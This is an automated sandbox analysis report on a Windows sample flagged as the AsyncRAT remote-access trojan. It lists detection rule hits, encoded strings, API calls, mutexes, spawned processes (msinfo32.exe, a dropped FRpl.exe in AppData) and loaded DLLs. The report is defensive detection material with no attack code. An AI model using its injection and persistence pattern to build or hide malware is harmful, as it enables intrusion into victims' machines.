Source: 00000005.00000002.1896700546.0000020480001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpack, DEFIHDVujRsN0tATihu7Q.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpack, DEFIHDVujRsN0tATihu7Q.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpack, QPC3X8NezKCgQQTAhJOAN.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.msinfo32.exe.204fd720000.1.raw.unpack, DEFIHDVujRsN0tATihu7Q.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.msinfo32.exe.204fd720000.1.raw.unpack, DEFIHDVujRsN0tATihu7Q.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.msinfo32.exe.204fd720000.1.raw.unpack, QPC3X8NezKCgQQTAhJOAN.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.msinfo32.exe.2048000d008.0.raw.unpack, DEFIHDVujRsN0tATihu7Q.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.msinfo32.exe.2048000d008.0.raw.unpack, DEFIHDVujRsN0tATihu7Q.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.msinfo32.exe.2048000d008.0.raw.unpack, QPC3X8NezKCgQQTAhJOAN.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.msinfo32.exe.27adef2d008.1.raw.unpack, DEFIHDVujRsN0tATihu7Q.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.msinfo32.exe.27adef2d008.1.raw.unpack, DEFIHDVujRsN0tATihu7Q.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpack, DEFIHDVujRsN0tATihu7Q.cs	Base64 encoded string: 'sqnHl2cvzvVPJFDo4yGMhcu4ge3mYFwlOarj3ROMPJfXcIewYx9T', 'PAJcp0g2rNEoqOljGk7vcgLEzIdg3s3C6ZnLa9QHv1W9STF3ENLn', 'rvpmRaMptQDTyJx06OEzApwF3e0nHAt2Hbz4NdyI6T445MdHhUYS', 'ZsuL3ijdo0WoRZXWkXItPAKBoQ4psayqIdk3Y74hceHfkQjXBsIU2LFIsOoqMQkxRgjjtVuwpjwr9Xuxc7LQ', 'JiVrHCKk3JAYexleEwJlWIfsm84LXEc94bMdZ7vh6B4E9v1ImeqStBRrh69X1X7gKubHjvjms3eUBbsUZ5OF', 'PH7x9n74N0yE6mrLemUXfKZjZtkBFlLIjUc3hu948AJEA1vgtYPBIgABzW7bTnJ5n6rIXqZM5gJrU4rTjwux', 'hXMy3bdZCh4gdkiPk0hem9ViKWzIKYBcAmtHrTUAtNzi0yJviSXPBZoDXMNe7ceCvTP9N26zNrpu3sPzXBct', 'UA8oKGPplJMkL81HcyJ6P8BsxfwpxKXnmnTSHnko5899t5FfAbybuWbNY0l5i2oNdsGvN35MxvhJXlFyPXqQ', 'ZXWejaOLsFGljriJOlJp5DYiDVWyfJMI4AmjcrxajWrBHnZb92jyLMKqcPzmzTvUP56nCBrS0APYaIVi5oRu', 'hgINGRIVzLQtMnFOG7gGY6mj6wkLFY7TQUXRG1r3shLHdFjFDNZTGDFsQ7SeRjHugzsc07C45WMGRMcoUYuL'
Source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpack, f7PGrVhFtmc98BagCIsr0.cs	Base64 encoded string: 'zJwKt0NhO3Y8amV5AW24PPbkaPntpzB7WsbbT56lawJ7wulVaVHS'
Source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpack, QPC3X8NezKCgQQTAhJOAN.cs	Base64 encoded string: 'HCAF333EQi3JVqAZ1ER7Z1mgc8ntqG8kbQbMdVjJqZCmgXhBt7Js', 'RiEuOqT7MaYXVjbwZhoW5ytIlo61bRgwZDqW8ftek0qSoFHL1IJy'
Source: 5.2.msinfo32.exe.204fd720000.1.raw.unpack, DEFIHDVujRsN0tATihu7Q.cs	Base64 encoded string: 'sqnHl2cvzvVPJFDo4yGMhcu4ge3mYFwlOarj3ROMPJfXcIewYx9T', 'PAJcp0g2rNEoqOljGk7vcgLEzIdg3s3C6ZnLa9QHv1W9STF3ENLn', 'rvpmRaMptQDTyJx06OEzApwF3e0nHAt2Hbz4NdyI6T445MdHhUYS', 'ZsuL3ijdo0WoRZXWkXItPAKBoQ4psayqIdk3Y74hceHfkQjXBsIU2LFIsOoqMQkxRgjjtVuwpjwr9Xuxc7LQ', 'JiVrHCKk3JAYexleEwJlWIfsm84LXEc94bMdZ7vh6B4E9v1ImeqStBRrh69X1X7gKubHjvjms3eUBbsUZ5OF', 'PH7x9n74N0yE6mrLemUXfKZjZtkBFlLIjUc3hu948AJEA1vgtYPBIgABzW7bTnJ5n6rIXqZM5gJrU4rTjwux', 'hXMy3bdZCh4gdkiPk0hem9ViKWzIKYBcAmtHrTUAtNzi0yJviSXPBZoDXMNe7ceCvTP9N26zNrpu3sPzXBct', 'UA8oKGPplJMkL81HcyJ6P8BsxfwpxKXnmnTSHnko5899t5FfAbybuWbNY0l5i2oNdsGvN35MxvhJXlFyPXqQ', 'ZXWejaOLsFGljriJOlJp5DYiDVWyfJMI4AmjcrxajWrBHnZb92jyLMKqcPzmzTvUP56nCBrS0APYaIVi5oRu', 'hgINGRIVzLQtMnFOG7gGY6mj6wkLFY7TQUXRG1r3shLHdFjFDNZTGDFsQ7SeRjHugzsc07C45WMGRMcoUYuL'
Source: 5.2.msinfo32.exe.204fd720000.1.raw.unpack, f7PGrVhFtmc98BagCIsr0.cs	Base64 encoded string: 'zJwKt0NhO3Y8amV5AW24PPbkaPntpzB7WsbbT56lawJ7wulVaVHS'
Source: 5.2.msinfo32.exe.204fd720000.1.raw.unpack, QPC3X8NezKCgQQTAhJOAN.cs	Base64 encoded string: 'HCAF333EQi3JVqAZ1ER7Z1mgc8ntqG8kbQbMdVjJqZCmgXhBt7Js', 'RiEuOqT7MaYXVjbwZhoW5ytIlo61bRgwZDqW8ftek0qSoFHL1IJy'
Source: 5.2.msinfo32.exe.2048000d008.0.raw.unpack, DEFIHDVujRsN0tATihu7Q.cs	Base64 encoded string: 'sqnHl2cvzvVPJFDo4yGMhcu4ge3mYFwlOarj3ROMPJfXcIewYx9T', 'PAJcp0g2rNEoqOljGk7vcgLEzIdg3s3C6ZnLa9QHv1W9STF3ENLn', 'rvpmRaMptQDTyJx06OEzApwF3e0nHAt2Hbz4NdyI6T445MdHhUYS', 'ZsuL3ijdo0WoRZXWkXItPAKBoQ4psayqIdk3Y74hceHfkQjXBsIU2LFIsOoqMQkxRgjjtVuwpjwr9Xuxc7LQ', 'JiVrHCKk3JAYexleEwJlWIfsm84LXEc94bMdZ7vh6B4E9v1ImeqStBRrh69X1X7gKubHjvjms3eUBbsUZ5OF', 'PH7x9n74N0yE6mrLemUXfKZjZtkBFlLIjUc3hu948AJEA1vgtYPBIgABzW7bTnJ5n6rIXqZM5gJrU4rTjwux', 'hXMy3bdZCh4gdkiPk0hem9ViKWzIKYBcAmtHrTUAtNzi0yJviSXPBZoDXMNe7ceCvTP9N26zNrpu3sPzXBct', 'UA8oKGPplJMkL81HcyJ6P8BsxfwpxKXnmnTSHnko5899t5FfAbybuWbNY0l5i2oNdsGvN35MxvhJXlFyPXqQ', 'ZXWejaOLsFGljriJOlJp5DYiDVWyfJMI4AmjcrxajWrBHnZb92jyLMKqcPzmzTvUP56nCBrS0APYaIVi5oRu', 'hgINGRIVzLQtMnFOG7gGY6mj6wkLFY7TQUXRG1r3shLHdFjFDNZTGDFsQ7SeRjHugzsc07C45WMGRMcoUYuL'
Source: 5.2.msinfo32.exe.2048000d008.0.raw.unpack, f7PGrVhFtmc98BagCIsr0.cs	Base64 encoded string: 'zJwKt0NhO3Y8amV5AW24PPbkaPntpzB7WsbbT56lawJ7wulVaVHS'
Source: 5.2.msinfo32.exe.2048000d008.0.raw.unpack, QPC3X8NezKCgQQTAhJOAN.cs	Base64 encoded string: 'HCAF333EQi3JVqAZ1ER7Z1mgc8ntqG8kbQbMdVjJqZCmgXhBt7Js', 'RiEuOqT7MaYXVjbwZhoW5ytIlo61bRgwZDqW8ftek0qSoFHL1IJy'
Source: 11.2.msinfo32.exe.27adef2d008.1.raw.unpack, DEFIHDVujRsN0tATihu7Q.cs	Base64 encoded string: 'sqnHl2cvzvVPJFDo4yGMhcu4ge3mYFwlOarj3ROMPJfXcIewYx9T', 'PAJcp0g2rNEoqOljGk7vcgLEzIdg3s3C6ZnLa9QHv1W9STF3ENLn', 'rvpmRaMptQDTyJx06OEzApwF3e0nHAt2Hbz4NdyI6T445MdHhUYS', 'ZsuL3ijdo0WoRZXWkXItPAKBoQ4psayqIdk3Y74hceHfkQjXBsIU2LFIsOoqMQkxRgjjtVuwpjwr9Xuxc7LQ', 'JiVrHCKk3JAYexleEwJlWIfsm84LXEc94bMdZ7vh6B4E9v1ImeqStBRrh69X1X7gKubHjvjms3eUBbsUZ5OF', 'PH7x9n74N0yE6mrLemUXfKZjZtkBFlLIjUc3hu948AJEA1vgtYPBIgABzW7bTnJ5n6rIXqZM5gJrU4rTjwux', 'hXMy3bdZCh4gdkiPk0hem9ViKWzIKYBcAmtHrTUAtNzi0yJviSXPBZoDXMNe7ceCvTP9N26zNrpu3sPzXBct', 'UA8oKGPplJMkL81HcyJ6P8BsxfwpxKXnmnTSHnko5899t5FfAbybuWbNY0l5i2oNdsGvN35MxvhJXlFyPXqQ', 'ZXWejaOLsFGljriJOlJp5DYiDVWyfJMI4AmjcrxajWrBHnZb92jyLMKqcPzmzTvUP56nCBrS0APYaIVi5oRu', 'hgINGRIVzLQtMnFOG7gGY6mj6wkLFY7TQUXRG1r3shLHdFjFDNZTGDFsQ7SeRjHugzsc07C45WMGRMcoUYuL'
Source: 11.2.msinfo32.exe.27adef2d008.1.raw.unpack, f7PGrVhFtmc98BagCIsr0.cs	Base64 encoded string: 'zJwKt0NhO3Y8amV5AW24PPbkaPntpzB7WsbbT56lawJ7wulVaVHS'
Source: 11.2.msinfo32.exe.27adef2d008.1.raw.unpack, QPC3X8NezKCgQQTAhJOAN.cs	Base64 encoded string: 'HCAF333EQi3JVqAZ1ER7Z1mgc8ntqG8kbQbMdVjJqZCmgXhBt7Js', 'RiEuOqT7MaYXVjbwZhoW5ytIlo61bRgwZDqW8ftek0qSoFHL1IJy'
Source: 11.2.msinfo32.exe.27adee40000.0.raw.unpack, DEFIHDVujRsN0tATihu7Q.cs	Base64 encoded string: 'sqnHl2cvzvVPJFDo4yGMhcu4ge3mYFwlOarj3ROMPJfXcIewYx9T', 'PAJcp0g2rNEoqOljGk7vcgLEzIdg3s3C6ZnLa9QHv1W9STF3ENLn', 'rvpmRaMptQDTyJx06OEzApwF3e0nHAt2Hbz4NdyI6T445MdHhUYS', 'ZsuL3ijdo0WoRZXWkXItPAKBoQ4psayqIdk3Y74hceHfkQjXBsIU2LFIsOoqMQkxRgjjtVuwpjwr9Xuxc7LQ', 'JiVrHCKk3JAYexleEwJlWIfsm84LXEc94bMdZ7vh6B4E9v1ImeqStBRrh69X1X7gKubHjvjms3eUBbsUZ5OF', 'PH7x9n74N0yE6mrLemUXfKZjZtkBFlLIjUc3hu948AJEA1vgtYPBIgABzW7bTnJ5n6rIXqZM5gJrU4rTjwux', 'hXMy3bdZCh4gdkiPk0hem9ViKWzIKYBcAmtHrTUAtNzi0yJviSXPBZoDXMNe7ceCvTP9N26zNrpu3sPzXBct', 'UA8oKGPplJMkL81HcyJ6P8BsxfwpxKXnmnTSHnko5899t5FfAbybuWbNY0l5i2oNdsGvN35MxvhJXlFyPXqQ', 'ZXWejaOLsFGljriJOlJp5DYiDVWyfJMI4AmjcrxajWrBHnZb92jyLMKqcPzmzTvUP56nCBrS0APYaIVi5oRu', 'hgINGRIVzLQtMnFOG7gGY6mj6wkLFY7TQUXRG1r3shLHdFjFDNZTGDFsQ7SeRjHugzsc07C45WMGRMcoUYuL'
Source: 11.2.msinfo32.exe.27adee40000.0.raw.unpack, f7PGrVhFtmc98BagCIsr0.cs	Base64 encoded string: 'zJwKt0NhO3Y8amV5AW24PPbkaPntpzB7WsbbT56lawJ7wulVaVHS'
Source: 11.2.msinfo32.exe.27adee40000.0.raw.unpack, QPC3X8NezKCgQQTAhJOAN.cs	Base64 encoded string: 'HCAF333EQi3JVqAZ1ER7Z1mgc8ntqG8kbQbMdVjJqZCmgXhBt7Js', 'RiEuOqT7MaYXVjbwZhoW5ytIlo61bRgwZDqW8ftek0qSoFHL1IJy'

Source: 11.2.msinfo32.exe.27adee40000.0.raw.unpack, 53kvWsRLWy1HlNtdTMls9U9Iz9UTCyLKs0tn5kq9Za6nq4kh3trrjLgOPGiq5C.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 11.2.msinfo32.exe.27adee40000.0.raw.unpack, 53kvWsRLWy1HlNtdTMls9U9Iz9UTCyLKs0tn5kq9Za6nq4kh3trrjLgOPGiq5C.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.msinfo32.exe.204fd720000.1.raw.unpack, 53kvWsRLWy1HlNtdTMls9U9Iz9UTCyLKs0tn5kq9Za6nq4kh3trrjLgOPGiq5C.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 5.2.msinfo32.exe.204fd720000.1.raw.unpack, 53kvWsRLWy1HlNtdTMls9U9Iz9UTCyLKs0tn5kq9Za6nq4kh3trrjLgOPGiq5C.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpack, 53kvWsRLWy1HlNtdTMls9U9Iz9UTCyLKs0tn5kq9Za6nq4kh3trrjLgOPGiq5C.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpack, 53kvWsRLWy1HlNtdTMls9U9Iz9UTCyLKs0tn5kq9Za6nq4kh3trrjLgOPGiq5C.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 11.2.msinfo32.exe.27adef2d008.1.raw.unpack, 53kvWsRLWy1HlNtdTMls9U9Iz9UTCyLKs0tn5kq9Za6nq4kh3trrjLgOPGiq5C.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 11.2.msinfo32.exe.27adef2d008.1.raw.unpack, 53kvWsRLWy1HlNtdTMls9U9Iz9UTCyLKs0tn5kq9Za6nq4kh3trrjLgOPGiq5C.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.msinfo32.exe.2048000d008.0.raw.unpack, 53kvWsRLWy1HlNtdTMls9U9Iz9UTCyLKs0tn5kq9Za6nq4kh3trrjLgOPGiq5C.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 5.2.msinfo32.exe.2048000d008.0.raw.unpack, 53kvWsRLWy1HlNtdTMls9U9Iz9UTCyLKs0tn5kq9Za6nq4kh3trrjLgOPGiq5C.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.evad.winEXE@12/3@2/2

Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe

Code function: 0_2_002AD4B0 memset,FormatMessageW,memcpy,GetLastError,

0_2_002AD4B0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe

Code function: 0_2_002CF500 SetLastError,GetCurrentDirectoryW,GetLastError,GetLastError,GetLastError,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlLookupFunctionEntry,CreateToolhelp32Snapshot,memset,Module32FirstW,Module32NextW,UnmapViewOfFile,CloseHandle,UnmapViewOfFile,CloseHandle,CloseHandle,RtlVirtualUnwind,

0_2_002CF500

Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe

File created: C:\Users\user\AppData\Roaming\qNl6oqz9

Jump to behavior

Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Mutant created: NULL
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Mutant created: \Sessions\1\BaseNamedObjects\IE7fbCaB2pyhKXUX
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6912:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6092:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6932:120:WilError_03

Source: SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe

Virustotal: Detection: 25%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe

File read: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe "C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Process created: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe "C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe "C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe"
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Process created: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe "C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe "C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe"
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Process created: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe "C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Process created: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe "C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Process created: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe "C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Process created: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe "C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe"	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Section loaded: iertutil.dll	Jump to behavior
